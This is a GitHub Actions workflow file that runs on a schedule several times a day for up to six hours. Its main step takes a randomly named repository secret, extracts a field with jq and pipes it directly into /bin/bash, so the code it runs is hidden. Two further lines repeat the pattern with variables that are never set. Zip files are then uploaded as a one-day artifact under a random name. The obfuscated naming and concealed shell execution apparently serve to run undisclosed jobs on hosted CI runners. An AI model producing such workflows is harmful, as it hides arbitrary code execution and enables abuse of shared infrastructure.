name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '42 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          lrii95159: ${{ secrets.lrii95159 }}
        run: |
          printf '%s' "$lrii95159" | jq -r .aoyiz3 | /bin/bash
          printf '%s' "$jya3" | jq -r .az85291 | /bin/bash
          printf '%s' "$fdu8" | jq -r .wb76 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: H6F3oscL
          path: "*.zip"
          retention-days: 1
